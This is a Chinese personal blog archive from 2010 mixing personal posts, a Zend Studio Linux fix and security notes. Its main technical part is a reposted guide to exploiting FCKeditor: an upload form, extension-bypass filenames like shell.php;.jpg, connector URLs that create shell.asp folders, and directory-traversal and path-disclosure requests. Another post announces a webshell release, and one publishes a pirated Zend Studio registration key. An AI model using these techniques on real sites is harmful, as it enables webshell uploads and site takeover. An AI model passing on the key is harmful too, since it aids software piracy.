Archive for April, 2010:
DarkBlade 1.3源码发布,最后的礼物!
BS大牛最后发出来的工具,DarkBlade..唉,人才啊...
说到做到,源码发出来给大家玩,本来有些地方准备改进,也没心情去弄了!
所有杀毒软件,IIS防火墙,在这个shell面前形同虚设,只要你会用,信不信?
再见!
bloodsword牛离开安全界了...
弃剑毁琴,自废武功,再不过问江湖事。从此,安全界不再有bloodsword这号人物
得到确切的消息了
人家已经准备结婚了,51跟海关男去成都玩,祝你们幸福 
输,也要输得有风度,有气度!
你给我回短信的时候躲躲闪闪,逃避我的话题,或者故意快11点才回,然后说你要睡觉了。没有关系,我假装看不出来!
你口口声声叫我不要想太多,你让我怎么不想太多?
你以前不是这样一个人,以前你很直接,从不掩饰,一直都是我在逃避你,不知道为什么你变成这个样子了,我不懂。也许时间真的可以改变一个人。。。。
如果以前因为老衲的冷漠,伤害了你,我道歉!并且希望你能够一笑而过
我说过,其他任何时候我都可以输。但这一次,我输不起,但是我已经输了。输不起又怎么样?我输得惨淡,输得彻底。
6年来,我一直在逃避,到今天,避无可避。
我以为自己可以把感情强压住,痛痛快快当一个拉风的老光棍,我错了。
好吧,我痛快的承认,老衲是个怪物,我的心跟常人不一样。没人能了解我,连我自己都不了解自己!
所有安慰我的人,谢谢你们,但请你们不要再浪费时间了。你们不了解我,我的固执,远远超出你们所有人的想象!
这种程度的打击,也许对你们来说不算什么,也许第二天你们就可以重新开始。但对于我,对不起,刻骨铭心,永世难忘。
也许在你们看来,我还有事业,还有闪亮的前程。但那些东西,老夫早就看得淡了。
富贵于我如浮云,我不在乎事业,我不在乎前途。
当我最终选择面对的时候,却发现已经太晚了。。。。
人家有自己的生活,无谓再去打扰人家了。。。
呵呵,原来一直以来都是我在一厢情愿 Read more »
ACCESS 外链文件
1 2 3 4 5 6 7 8 9 10 11 | --从Excel中获取数据 SELECT * FROM [Excel 8.0;Database=D:\Test.xls].[Sheet1$] --生成Excel数据 SELECT * INTO [Excel 8.0;Database=D:\Test1.xls].Sheet1 FROM 表名 --从txt文件中获取数据 SELECT * FROM [text;database=d:\;hdr=no].test.txt --查询别的MDB文件 SELECT * FROM 表名 IN 'd:\test.mdb' |
Fckeditor漏洞利用方法总结
来源:http://huairen.me/archives/369.html
查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
1 2 3 4 5 | <form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”>Upload a new file:<br> <input type=”file” name=”NewFile” size=”50″><br> <input id=”btnUpload” type=”submit” value=”Upload”> </form> |
—————————————————————————————————————————————————————————————
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————
8.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11. FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为”Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————
12.最古老的漏洞,Type文件没有限制!
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
备注 ACCESS INSERT注入可用
记录一下,ACCESS INSERT可用的注入
DFirst,DLast,DLookup
tplink r402升级引起的wordpress登陆死循环
唉,无聊,前天看到官方有TPLINK R402官方有新的升级包,就升级了一下成090826,老早的时候升级成了0810,一直就没搞过了。这次升完之后,发现wordpress无法正常进入后台了,一直在登陆那死循环。
找了一个070112,刷完之后正常进入后台。。。
当前软件版本: 3.3.1 Build 070712 Rel.33961na
zend studio 7.1.2 ubuntu下按钮失效的解决方法
作者:st0p
转载请注明出处http://www.st0p.org
在ubuntu 下zend studio 7.1.2按钮失效,只能回车的解决方法如下。
我的zend studio装在/home/st0p/Zend/ZendStudio-7.1.2(请根据情况修改用户名或你的安装路径),这个路径等下我们要用到
进入/home/st0p/Zend/ZendStudio-7.1.2目录
新建文件ZendStudio_Fix,内容如下
1 2 3 | #!/bin/bash export GDK_NATIVE_WINDOWS=true /home/st0p/Zend/ZendStudio-7.1.2/ZendStudio |
然后在终端下进入/home/st0p/Zend/ZendStudio-7.1.2目录,运行sudo chmod +x ZendStudio_Fix
在桌面上建立启动器
名称为:Zend Studio - 7.1.2
图标为:/home/st0p/Zend/ZendStudio-7.1.2/icon.xpm
命令为:home/st0p/Zend/ZendStudio-7.1.2/ZendStudio_Fix
zend studio 7.1.2 注册版
最近在UBUNTU下,所以偶下的是Linux x86 32 bit
Linux x86 32 bit:http://downloads.zend.com/studio-eclipse/7.1.2/ZendStudio-7.1.2.tar.gz
Windows x86 EXE:http://downloads.zend.com/studio-eclipse/7.1.2/ZendStudio-7.1.2.exe
注册信息如下:
st0p.org
33E3E87D6DB93E8487D6DB9
刚空间挂了
昨天修改配置文件时上传的时候老是传上去0K的文件,最后叫KINDLE,传的,当时访问正常了。谁知道刚起来神刀说我网站打不开,连上FTP,发现配置文件不存在。。。唉。。。有一段时间没发BLOG了。昨天发个分析,改点东西,就出这个事。真郁闷。。。
让人蛋疼的1块钱
唉,让人郁闷的事,让人蛋疼的标题。。
今天去接老婆的路上,饿了,想吃点东西,一拿钱包,就两张100的,一张1块的了。。那天交了驾校的钱里面就只有201了。。
然后在去的路上转了下。。没见有1块钱能吃的东西,拿100的换开吧,又吃不多,人家以为你是换钱的。要真吃饱了,等下老婆该说我又开小灶,不带她吃了。。
结果饿着接到老婆,才和她一起吃到东西。。
越来越想以前了,前几年1块钱还可以吃两个烧饼,喝两碗豆腐脑呢,还有。。。。多的东西。。。
现在钱越来越不值钱了,是好事是坏事?为啥光看到物价涨,不看到赚的钱变多呢。。为啥这两者不同步增长呢?
听说国家要出面值500的人民币了,YY一下,要是哪天只带500的出门,手机没电想打公用电话时,人家找不开你给的钱,会不会蛋疼。。